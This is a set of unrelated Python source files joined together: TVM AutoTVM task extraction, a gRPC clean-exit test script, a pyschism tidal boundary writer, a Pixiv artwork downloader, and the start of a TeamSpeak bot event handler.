relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name, not-context-manager
"""
Decorator and utilities for the integration with TOPI and Relay
99.9% copy-paste of implementation by @MerryMercy
"""
import threading
import logging
from copy import deepcopy
import tvm
from tvm.autotvm.task.dispatcher import DispatchContext, FallbackContext
from tvm.target import Target
from .task import create
from .topi_integration import TaskExtractEnv
logger = logging.getLogger("autotvm")
# TODO(moreau89) find a more elegant way to lower for VTAs
def _lower(mod, target, params):
"""Helper to lower VTA properly."""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_executor_codegen
if hasattr(target, "device_name") and target.device_name == "vta":
import vta
with vta.build_config(opt_level=3, disabled_pass={"AlterOpLayout"}):
mod, _ = relay.optimize(mod, target, params)
grc = graph_executor_codegen.GraphExecutorCodegen(None, target)
grc.codegen(mod["main"])
return
# default case
# Try graph codegen first to extract autotvm tasks.
# If failed to compile, then fallback to use VM compiler.
# TODO: Currently VM compiler is likely to stack overflow for large models.
try:
# TODO(jwfromm) Remove this once AlterOpLayout bug that mutates
# source module is fixed. Until then, create a clone.
mod_clone = deepcopy(mod)
opt_mod, _ = relay.optimize(mod_clone, target, params)
grc = graph_executor_codegen.GraphExecutorCodegen(None, target)
grc.codegen(opt_mod["main"])
except tvm.TVMError as e:
print(
"Get errors with GraphExecutorCodegen for task extraction. "
"Fallback to VMCompiler. Error details:\n%s" % str(e)
)
mod_clone = deepcopy(mod)
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod_clone, target=target)
def extract_from_program(mod, params, target, target_host=None, ops=None):
"""Extract tuning tasks from a relay program.
This function is the single program version of extract_from_multiple_program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
target, target_host = Target.check_and_update_host_consist(target, target_host)
return extract_from_multiple_program([mod], [params], target, ops=ops)
def extract_from_multiple_program(mods, params, target, target_host=None, ops=None):
"""Extract tuning tasks from multiple relay programs.
This function collects tuning tasks by building a list of programs
with a "tracing" target and tracing all the calls to topi.
Parameters
----------
mods: List[tvm.IRModule] or List[relay.function.Function]
The list of modules or functions to tune
params: List of dict of str to numpy array
The associated parameters of the programs
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm import topi
env = TaskExtractEnv.get()
# merge target and target host
target, target_host = Target.check_and_update_host_consist(target, target_host)
# run compiler to collect all TOPI calls during compilation
env.reset(ops)
with env:
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
for mod, param in zip(mods, params):
if isinstance(mod, relay.function.Function):
mod = tvm.IRModule.from_expr(mod)
assert isinstance(
mod, tvm.IRModule
), "only support relay Module or Function to be tuned"
relay.backend.compile_engine.get().clear()
# wrap build call in thread to avoid multiprocessing problems
build_thread = threading.Thread(target=_lower, args=(mod, target, param))
build_thread.start()
build_thread.join()
relay.backend.compile_engine.get().clear()
# Clear the warning message cache in FallbackContext
if isinstance(DispatchContext.current, FallbackContext):
DispatchContext.current.memory = {}
DispatchContext.warning_messages = set()
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
try:
tsk = create(task_name, args, target=target)
tasks.append(tsk)
except topi.InvalidShapeError:
logger.warning("Invalid shape during AutoTVM task creation")
return tasks
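# Hedged usage sketch (not part of the original module): how the extraction
# helpers above are typically driven. "my_mod" and "my_params" are hypothetical
# placeholders for a real relay module and its parameter dict.
def _example_extract_tasks(my_mod, my_params):
    """Extract tunable tasks from a relay module for the local CPU target."""
    target = Target("llvm")
    tasks = extract_from_program(my_mod, my_params, target)
    for tsk in tasks:
        logger.info("extracted task: %s", tsk)
    return tasks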
|
_exit_scenarios.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines a number of module-scope gRPC scenarios to test clean exit."""
import argparse
import threading
import time
import grpc
from tests.unit.framework.common import test_constants
WAIT_TIME = 1000
REQUEST = b'request'
UNSTARTED_SERVER = 'unstarted_server'
RUNNING_SERVER = 'running_server'
POLL_CONNECTIVITY_NO_SERVER = 'poll_connectivity_no_server'
POLL_CONNECTIVITY = 'poll_connectivity'
IN_FLIGHT_UNARY_UNARY_CALL = 'in_flight_unary_unary_call'
IN_FLIGHT_UNARY_STREAM_CALL = 'in_flight_unary_stream_call'
IN_FLIGHT_STREAM_UNARY_CALL = 'in_flight_stream_unary_call'
IN_FLIGHT_STREAM_STREAM_CALL = 'in_flight_stream_stream_call'
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL = 'in_flight_partial_unary_stream_call'
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL = 'in_flight_partial_stream_unary_call'
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL = 'in_flight_partial_stream_stream_call'
UNARY_UNARY = b'/test/UnaryUnary'
UNARY_STREAM = b'/test/UnaryStream'
STREAM_UNARY = b'/test/StreamUnary'
STREAM_STREAM = b'/test/StreamStream'
PARTIAL_UNARY_STREAM = b'/test/PartialUnaryStream'
PARTIAL_STREAM_UNARY = b'/test/PartialStreamUnary'
PARTIAL_STREAM_STREAM = b'/test/PartialStreamStream'
TEST_TO_METHOD = {
IN_FLIGHT_UNARY_UNARY_CALL: UNARY_UNARY,
IN_FLIGHT_UNARY_STREAM_CALL: UNARY_STREAM,
IN_FLIGHT_STREAM_UNARY_CALL: STREAM_UNARY,
IN_FLIGHT_STREAM_STREAM_CALL: STREAM_STREAM,
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL: PARTIAL_UNARY_STREAM,
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL: PARTIAL_STREAM_UNARY,
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL: PARTIAL_STREAM_STREAM,
}
def hang_unary_unary(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_unary_stream(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_unary_stream(request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield request
time.sleep(WAIT_TIME)
def hang_stream_unary(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_unary(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
next(request_iterator)
time.sleep(WAIT_TIME)
def hang_stream_stream(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_stream(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield next(request_iterator)
time.sleep(WAIT_TIME)
class MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming, partial_hang):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = None
self.response_serializer = None
self.unary_unary = None
self.unary_stream = None
self.stream_unary = None
self.stream_stream = None
if self.request_streaming and self.response_streaming:
if partial_hang:
self.stream_stream = hang_partial_stream_stream
else:
self.stream_stream = hang_stream_stream
elif self.request_streaming:
if partial_hang:
self.stream_unary = hang_partial_stream_unary
else:
self.stream_unary = hang_stream_unary
elif self.response_streaming:
if partial_hang:
self.unary_stream = hang_partial_unary_stream
else:
self.unary_stream = hang_unary_stream
else:
self.unary_unary = hang_unary_unary
class GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == UNARY_UNARY:
return MethodHandler(False, False, False)
elif handler_call_details.method == UNARY_STREAM:
return MethodHandler(False, True, False)
elif handler_call_details.method == STREAM_UNARY:
return MethodHandler(True, False, False)
elif handler_call_details.method == STREAM_STREAM:
return MethodHandler(True, True, False)
elif handler_call_details.method == PARTIAL_UNARY_STREAM:
return MethodHandler(False, True, True)
elif handler_call_details.method == PARTIAL_STREAM_UNARY:
return MethodHandler(True, False, True)
elif handler_call_details.method == PARTIAL_STREAM_STREAM:
return MethodHandler(True, True, True)
else:
return None
# Traditional executors will not exit until all their
# current jobs complete. Because we submit jobs that will
# never finish, we don't want to block exit on these jobs.
class DaemonPool(object):
def submit(self, fn, *args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
def shutdown(self, wait=True):
pass
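# Hedged mini-demo (not used by the scenarios below): a job submitted to
# DaemonPool runs on a daemon thread, so even a job that never returns does not
# keep the interpreter alive at exit.
def _daemon_pool_demo():
    pool = DaemonPool()
    pool.submit(time.sleep, WAIT_TIME)  # hangs "forever", but on a daemon thread
    pool.shutdown()  # intentionally a no-op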
def infinite_request_iterator():
while True:
yield REQUEST
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('scenario', type=str)
parser.add_argument(
'--wait_for_interrupt', dest='wait_for_interrupt', action='store_true')
args = parser.parse_args()
if args.scenario == UNSTARTED_SERVER:
server = grpc.server((), DaemonPool())
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == RUNNING_SERVER:
server = grpc.server((), DaemonPool())
port = server.add_insecure_port('[::]:0')
server.start()
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY_NO_SERVER:
channel = grpc.insecure_channel('localhost:12345')
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY:
server = grpc.server((), DaemonPool())
port = server.add_insecure_port('[::]:0')
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
else:
handler = GenericHandler()
server = grpc.server((), DaemonPool())
port = server.add_insecure_port('[::]:0')
server.add_generic_rpc_handlers((handler,))
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
method = TEST_TO_METHOD[args.scenario]
if args.scenario == IN_FLIGHT_UNARY_UNARY_CALL:
multi_callable = channel.unary_unary(method)
future = multi_callable.future(REQUEST)
result, call = multi_callable.with_call(REQUEST)
elif (args.scenario == IN_FLIGHT_UNARY_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL):
multi_callable = channel.unary_stream(method)
response_iterator = multi_callable(REQUEST)
for response in response_iterator:
pass
elif (args.scenario == IN_FLIGHT_STREAM_UNARY_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL):
multi_callable = channel.stream_unary(method)
future = multi_callable.future(infinite_request_iterator())
result, call = multi_callable.with_call(
[REQUEST] * test_constants.STREAM_LENGTH)
elif (args.scenario == IN_FLIGHT_STREAM_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL):
multi_callable = channel.stream_stream(method)
response_iterator = multi_callable(infinite_request_iterator())
for response in response_iterator:
pass
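# Hedged usage note: a scenario is selected by name on the command line, e.g.
#   python _exit_scenarios.py unstarted_server
#   python _exit_scenarios.py in_flight_unary_unary_call --wait_for_interrupt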
|
bctides.py
|
from datetime import datetime, timedelta
import pathlib
from typing import Dict, Union
import logging
from pyschism import dates
from pyschism.mesh.vgrid import Vgrid
from pyschism.forcing.bctides import iettype, ifltype, isatype, itetype, itrtype, Tides
from pyschism.forcing.bctides.elev2d import Elev2D
from pyschism.forcing.bctides.uv3d import UV3D
from pyschism.forcing.bctides.mod3d import TEM_3D, SAL_3D
logger = logging.getLogger(__name__)
class IbctypeDescriptor:
def __init__(self, name, bctype):
self.name = name
self.bctype = bctype
def __get__(self, obj, val):
return obj.gdf[self.name]
def __set__(self, obj, val):
if val is not None:
if isinstance(val, dict):
for bnd_id, ibctype in val.items():
if not isinstance(ibctype, (self.bctype, type(None))):
raise TypeError(
f"Argument {ibctype} must be of type {self.bctype} "
f"or None, not type {type(ibctype)}."
)
# TODO
raise NotImplementedError("Need to find the column name")
idxs = obj.gdf[
(obj.gdf["id"] == bnd_id & obj.gdf["id"] == bnd_id)
].index.values
for idx in idxs:
obj.gdf.at[idx, val] = obj
else:
if not isinstance(val, self.bctype):
raise TypeError(
f"Argument {self.name} must be of type "
f"{self.bctype}, not type {type(val)}."
)
obj.gdf[self.name] = val
class BctidesMeta(type):
def __new__(meta, name, bases, attrs):
bctypes = {
"iettype": iettype.Iettype,
"ifltype": ifltype.Ifltype,
"isatype": isatype.Isatype,
"itetype": itetype.Itetype,
"itrtype": itrtype.Itrtype,
}
for attr_name, ibctype in bctypes.items():
attrs[attr_name] = IbctypeDescriptor(attr_name, ibctype)
return type(name, bases, attrs)
class Bctides(metaclass=BctidesMeta):
start_date = dates.StartDate()
end_date = dates.EndDate()
def __init__(
self,
hgrid,
vgrid=None,
iettype: Union[Dict, iettype.Iettype] = None,
ifltype: Union[Dict, ifltype.Ifltype] = None,
isatype: Union[Dict, isatype.Isatype] = None,
itetype: Union[Dict, itetype.Itetype] = None,
itrtype: Union[Dict, itrtype.Itrtype] = None,
cutoff_depth: float = 50.0,
):
self.hgrid = hgrid
self.vgrid = Vgrid.default() if vgrid is None else vgrid
self.cutoff_depth = cutoff_depth
self.iettype = iettype
self.ifltype = ifltype
self.isatype = isatype
self.itetype = itetype
self.itrtype = itrtype
def __str__(self):
f = [
f"{str(self.start_date)}",
f"{self.ntip} {self.cutoff_depth}",
]
if self.ntip > 0:
for constituent in self.tides.get_active_potential_constituents():
forcing = self.tides(self.start_date, self.rnday, constituent)
f.append(
" ".join(
[
f"{constituent}\n",
f"{forcing[0]:G}",
f"{forcing[1]:G}",
f"{forcing[2]:G}",
f"{forcing[3]:G}",
f"{forcing[4]:G}",
]
)
)
f.append(f"{self.nbfr:d}")
if self.nbfr > 0:
for constituent in self.tides.get_active_forcing_constituents():
forcing = self.tides(self.start_date, self.rnday, constituent)
f.append(
" ".join(
[
f"{constituent}\n",
f"{forcing[2]:G}",
f"{forcing[3]:G}",
f"{forcing[4]:G}",
]
)
)
global_constituents = self.tides.get_active_constituents()
f.append(f"{len(self.gdf)}")
for boundary in self.gdf.itertuples():
f.append(self.get_forcing_string(boundary, global_constituents))
return "\n".join(f)
def write(
self,
output_directory,
start_date: datetime = None,
end_date: Union[datetime, timedelta] = None,
bctides: Union[bool, str] = True,
elev2D: Union[bool, str] = True,
uv3D: Union[bool, str] = True,
tem3D: Union[bool, str] = True,
sal3D: Union[bool, str] = True,
overwrite: bool = False,
parallel_download=False,
progress_bar=True,
):
if start_date is not None:
self.start_date = start_date
if end_date is not None:
self.end_date = end_date
# self.tidal_database.write(path, )
output_directory = pathlib.Path(output_directory)
output_directory.mkdir(exist_ok=overwrite, parents=True)
bctides = output_directory / "bctides.in" if bctides is True else bctides
if bctides.exists() and not overwrite:
raise IOError("path exists and overwrite is False")
with open(bctides, "w") as f:
f.write(str(self))
# write nudge
for bctype, tracer in {"itetype": "TEM", "isatype": "SAL"}.items():
for boundary in self.gdf.itertuples():
data_source = getattr(boundary, bctype)
if data_source is not None:
# I admit this exec is hacky.
# pros: works well, it's simple, we don't need a return value
# cons: might be confusing to read.
# This generates all the nudges and writes the nudge files.
exec(
f"from pyschism.forcing.bctides.nudge import {tracer}_Nudge;"
f"_tracer = output_directory / f'{tracer}_nudge.gr3' if {tracer.lower()}3D is True else {tracer};"
f"_tr={tracer}_Nudge(self, data_source, rlmax=data_source.rlmax, rnu_day=data_source.rnu_day);"
f'logger.info(f"Writing {tracer} nudge to file '
+ r'{_tracer}");'
"_tr.write(_tracer, overwrite=overwrite)"
)
break
def write_elev2D():
_elev2D = output_directory / "elev2D.th.nc" if elev2D is True else elev2D
Elev2D(self).write(
_elev2D,
self.start_date,
self.rnday,
timedelta(days=1),
overwrite,
progress_bar=progress_bar,
)
def write_uv3D():
# write uv3D.th.nc
_uv3D = output_directory / "uv3D.th.nc" if uv3D is True else uv3D
UV3D(self).write(
_uv3D,
self.start_date,
self.rnday,
timedelta(days=1),
overwrite,
progress_bar=progress_bar,
)
def write_tem3D():
# write TEM_3D.th.nc
_tem3D = output_directory / "TEM_3D.th.nc" if tem3D is True else tem3D
TEM_3D(self).write(
_tem3D,
self.start_date,
self.rnday,
timedelta(days=1),
overwrite,
progress_bar=progress_bar,
)
def write_sal3D():
_sal3D = output_directory / "SAL_3D.th.nc" if sal3D is True else sal3D
SAL_3D(self).write(
_sal3D,
self.start_date,
self.rnday,
timedelta(days=1),
overwrite,
progress_bar=progress_bar,
)
if parallel_download is True:
from multiprocessing import Process
jobs = [
Process(target=f)
for f in (write_elev2D, write_uv3D, write_tem3D, write_sal3D)
]
for job in jobs:
job.start()
for job in jobs:
job.join()
else:
if elev2D:
write_elev2D()
if uv3D:
write_uv3D()
if tem3D:
write_tem3D()
if sal3D:
write_sal3D()
# def write_tracer(tracer):
# tracer.write()
# for tracer in [self.temperature, self.salinity, *self.tracers]:
# if tracer is not None:
# write_tracer(tracer)
def get_forcing_string(self, boundary, global_constituents):
bctypes = [
boundary.iettype,
boundary.ifltype,
boundary.itetype,
boundary.isatype,
]
def get_forcing_digit(bctype):
if bctype is not None:
# sensitive to MRO.
return str(
getattr(
bctype, f"{bctype.__class__.__bases__[0].__name__.lower()}")
)
return "0"
line = [
f"{len(boundary.indexes)}",
*[digit for digit in map(get_forcing_digit, bctypes)],
]
f = [" ".join(line)]
for bctype in bctypes:
if bctype is not None:
f.append(
bctype.get_boundary_string(
self.hgrid, boundary, global_constituents=global_constituents
)
)
return "\n".join(f)
@property
def gdf(self):
if not hasattr(self, "_gdf"):
self._gdf = self.hgrid.boundaries.open.copy()
self._gdf["iettype"] = None
self._gdf["ifltype"] = None
self._gdf["isatype"] = None
self._gdf["itetype"] = None
self._gdf["itrtype"] = None
return self._gdf
@property
def ntip(self):
return len(self.tides.get_active_potential_constituents())
@property
def nbfr(self):
return len(self.tides.get_active_forcing_constituents())
@property
def rnday(self):
return self.end_date - self.start_date
@property
def tides(self):
if not hasattr(self, "_tides"):
class TidalConstituentCombiner(Tides):
def __init__(self, gdf):
self.gdf = gdf
afc = self.get_active_forcing_constituents()
apc = self.get_active_potential_constituents()
for constituent in set([*afc, *apc]):
self.use_constituent(
constituent,
forcing=True if constituent in afc else False,
potential=True if constituent in apc else False,
)
def get_active_forcing_constituents(self):
active_constituents = set()
for row in self.gdf.itertuples():
if row.iettype is not None:
if row.iettype.iettype in [3, 5]:
[
active_constituents.add(x)
for x in row.iettype.tides.get_active_constituents()
]
if row.ifltype is not None:
if row.ifltype.ifltype in [3, 5]:
[
active_constituents.add(x)
for x in row.ifltype.tides.get_active_constituents()
]
return list(active_constituents)
def get_active_potential_constituents(self):
active_constituents = set()
for row in self.gdf.itertuples():
if row.iettype is not None:
if row.iettype.iettype in [3, 5]:
[
active_constituents.add(x)
for x in row.iettype.tides.get_active_potential_constituents()
]
if row.ifltype is not None:
if row.ifltype.ifltype in [3, 5]:
[
active_constituents.add(x)
for x in row.ifltype.tides.get_active_potential_constituents()
]
return list(active_constituents)
@property
def constituents(self):
if not hasattr(self, "_constituents"):
self._constituents = sorted(
list(
set(
[
*self.get_active_potential_constituents(),
*self.get_active_forcing_constituents(),
]
)
)
)
return self._constituents
self._tides = TidalConstituentCombiner(self.gdf)
return self._tides
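# Hedged usage sketch (not from the original file): "hgrid" and "elevation_bc"
# are hypothetical placeholders for an Hgrid instance and an iettype.Iettype
# boundary forcing.
#
#     bctides = Bctides(hgrid, iettype=elevation_bc)
#     bctides.start_date = datetime(2022, 1, 1)
#     bctides.end_date = datetime(2022, 1, 6)
#     bctides.write("outputs", overwrite=True)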
class TidesCombiner(Tides):
def __init__(self, bctides):
self.bctides = bctides
def get_active_potential_constituents(self):
const = dict()
# for row in self.bctides.gdf.itertuples():
# forcing = data['forcing']
# if isinstance(forcing, Tides):
# for active in forcing.get_active_potential_constituents():
# const[active] = True
# return tuple(const.keys())
# def get_active_forcing_constituents(self):
# # set active tidal forcing constituents
# const = dict()
# for id, data in self._model_domain.open_boundaries:
# forcing = data['forcing']
# if isinstance(forcing, Tides):
# for active in forcing.get_active_forcing_constituents():
# const[active] = True
# return tuple(const.keys())
# ----------- draft
# @property
# def tides(self):
# if not hasattr(self, '_tides'):
# # get the first one you can find, since the Tides object is a
# # singleton.
# tides = None
# for boundary in self.hgrid.boundaries.open.itertuples():
# if boundary.iettype is not None:
# if hasattr(boundary.iettype, "tides"):
# tides = boundary.iettype.tides
# break
# elif boundary.ifltype is not None:
# if hasattr(boundary.ifltype, "tides"):
# tides = boundary.ifltype.tides
# break
# self._tides = tides
# return self._tides
# @property
# def tracers(self) -> List[Dict[Any, Union[bctides.itrtype.Itrtype, None]]]:
# # if not hasattr(self, '_tracers'):
# # # tracers: List[Dict[Any, Union[itrtype.Itrtype, None]]] = []
# # boundary_data = {}
# # for boundary in self.hgrid.boundaries.open.itertuples():
# # itrtypes = boundary.itrtype
# # if itrtypes is None:
# # tracers.append({})
# # for tracer in boundary.itr
# # tracers.append()
# # tracer.setdefault(
# # )
# # _itrtype = boundary.itrtype
# # return self._tracers
# # TODO: Cheating for now...
# return []
# @property
# def ntip(self):
# if self.tides is None:
# return 0
# return len(self.tides.get_active_potential_constituents())
# @property
# def nbfr(self):
# if self.tides is None:
# return 0
# return self.tides.nbfr
# @property
# def Z0(self):
# if hasattr(self.tides, '_Z0'):
# return self.tides._Z0
# @Z0.setter
# def Z0(self, Z0):
# self.tides.add_Z0(Z0)
# @property
# def cutoff_depth(self):
# return self._cutoff_depth
# @cutoff_depth.setter
# def cutoff_depth(self, cutoff_depth: float):
# self._cutoff_depth = float(cutoff_depth)
# @property
# def subtidal_database(self):
# return self._subtidal_database
# @subtidal_database.setter
# def subtidal_database(self, subtidal_database: SubTidalDatabase):
# if subtidal_database is not None:
# # self._subtidal_database = Tides(subtidal_database=subtidal_database)
# else:
# self._subtidal_database = None
# @property
# def elevation(self):
# return self._elevation
# @elevation.setter
# def elevation(self, elevation):
# if elevation is not None:
# assert isinstance(elevation, iettype.Iettype)
# self._elevation = elevation
# @property
# def velocity(self):
# return self._velocity
# @velocity.setter
# def velocity(self, velocity):
# if velocity is not None:
# assert isinstance(velocity, ifltype.Ifltype)
# self._velocity = velocity
# @property
# def temperature(self):
# return self._temperature
# @temperature.setter
# def temperature(self, temperature: Union[itetype.Itetype, None]):
# if temperature is not None:
# assert isinstance(temperature, itetype.Itetype)
# self._temperature = temperature
# @property
# def salinity(self):
# return self._salinity
# @salinity.setter
# def salinity(self, salinity: Union[isatype.Isatype, None]):
# if salinity is not None:
# assert isinstance(salinity, isatype.Isatype)
# self._salinity = salinity
# class HgridDescriptor:
# def __set__(self, obj, val: Hgrid):
# if not isinstance(val, Hgrid):
# raise TypeError(
# f'Argument hgrid must be of type {Hgrid}, not type '
# f'{type(val)}.')
# obj.__dict__['hgrid'] = val
# def __get__(self, obj, val):
# return obj.__dict__['hgrid']
# class StartDateDescriptor:
# def __set__(self, obj, val: datetime):
# if not isinstance(val, datetime):
# raise TypeError(
# f'Argument start_date must be of type {datetime}, '
# f'not type {type(val)}.')
# if datetime_is_naive(val):
# val = pytz.timezone('UTC').localize(val)
# obj.__dict__['start_date'] = val
# def __get__(self, obj, val):
# return obj.__dict__['start_date']
# class RndayDescriptor:
# def __set__(self, obj, val: Union[int, float, timedelta]):
# if not isinstance(val, (int, float, timedelta)):
# raise TypeError(
# f'Argument rnday must be of type {int}, {float} or '
# f'{timedelta}, not type {type(val)}.')
# if not isinstance(val, timedelta):
# val = timedelta(days=val)
# obj.__dict__['rnday'] = val
# def __get__(self, obj, val) -> timedelta:
# return obj.__dict__['rnday']
|
main.py
|
import requests
import json
import sys
import traceback
import time
import re
import os
import threading
# User-Agent
userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"
# Export Log
exportLog = False
# Export Log File
exportLogfile = "log.txt"
# Api Address
apiAddress = "https://www.pixiv.net/ajax/illust/"
authorPrefix = "https://www.pixiv.net/ajax/user/"
authorSuffix = "/profile/all"
# Cookies
# Use ";" to split each term
cookies = ""
# Threads per second
threads_per_sec = 10
# Enable Proxy
enable_proxy = False
# Enable Remote DNS Resolve via Proxies
enable_remote_dns = True
# Proxy Settings
socks5_proxy_address = "127.0.0.1"
socks5_proxy_port = "1080"
if not enable_proxy:
proxiesDict = {}
else:
if enable_remote_dns:
proxiesDict = {
'http': "socks5h://" + socks5_proxy_address + ":" + socks5_proxy_port,
'https': "socks5h://" + socks5_proxy_address + ":" + socks5_proxy_port
}
else:
proxiesDict = {
'http': "socks5://" + socks5_proxy_address + ":" + socks5_proxy_port,
'https': "socks5://" + socks5_proxy_address + ":" + socks5_proxy_port
}
def print_log(content):
print(time.strftime('%Y-%m-%d %H:%M:%S\t', time.localtime(time.time())) + content)
sys.stdout.flush()
if exportLog:
f_log = open(exportLogfile, "a")
f_log.write(time.strftime('%Y-%m-%d %H:%M:%S\t', time.localtime(time.time())) + str(content) + '\n')
f_log.close()
return
def mkdir(path):
folder = os.path.exists(path)
if not folder:
os.makedirs(path)
print_log("Folder created.")
else:
print_log("Folder exist!")
def work(illust_id):
try:
contentJSON = requests.get(apiAddress + illust_id, headers=headers, proxies=proxiesDict)
decodeContent = json.loads(contentJSON.text)
if decodeContent['error']:
print_log("Illustration error.")
else:
if not os.path.exists(foldername + "\\" + illust_id + ".png"):
print_log("Downloading\t [" + decodeContent['body']['illustTitle'] + "]")
# print_log("\tAuthor\t [" + decodeContent['body']['userName'] + "]")
# print_log("\tRAW URL\t [" + decodeContent['body']['urls']['original'] + "]")
# print_log("\tRAW URL\t [" + decodeContent['body']['urls']['regular'] + "]")
headers1 = {
'Referer': 'https://www.pixiv.net/member_illust.php?mode=medium&illust_id=' + illust_id,
'cookie': cookies
}
content = requests.get(decodeContent['body']['urls']['original'], headers=headers1, proxies=proxiesDict)
f = open(foldername + "\\" + illust_id + ".png", "wb")
f.write(content.content)
f.close()
else:
print_log("Skip\t [" + decodeContent['body']['illustTitle'] + "]")
except Exception:
traceback.print_exc()
if __name__ == "__main__":
headers = {
"User-Agent": userAgent,
"cookie": cookies
}
while True:
# Fetch thumb list
author_id = input().strip()
contentJSON = requests.get(authorPrefix + author_id + authorSuffix, headers=headers, proxies=proxiesDict)
decodeContent = json.loads(contentJSON.text)
# Regex Match
try:
illusts = re.findall("[0-9]+", str(decodeContent['body']['illusts']))
except Exception:
continue
print_log("Counter\t" + str(len(illusts)))
# print_log(str(decodeContent))
try:
foldername = re.findall("'userName': '(.*)', 'userImageUrl'", str(decodeContent['body']['pickup']))[0]
except Exception:
try:
foldername = re.findall("<title>「(.*)」.*</title>",
requests.get("https://www.pixiv.net/member.php?id=" + author_id,
headers=headers, proxies=proxiesDict).text)[0]
except Exception:
foldername = author_id
print_log(foldername)
mkdir(foldername)
waitcount = 0
# Fetch item info
threads = []
for i in illusts:
illust_id = i
t = threading.Thread(target=work, args=(illust_id,))
t.daemon = False
t.start()
threads.append(t)
waitcount = waitcount + 1
if waitcount % threads_per_sec == 0:
time.sleep(1)
# t.join()
for thr in threads:
if thr.is_alive():
thr.join()
print_log("Job finished.")
|
EventHandler.py
|
"""EventHandler for the Teamspeak3 Bot."""
import ts3.Events as Events
import logging
import threading
class EventHandler(object):
"""
EventHandler class responsible for delegating events to registered listeners.
"""
logger = logging.getLogger("eventhandler")
logger.setLevel(logging.INFO)
file_handler = logging.FileHandler("eventhandler.log", mode='a+')
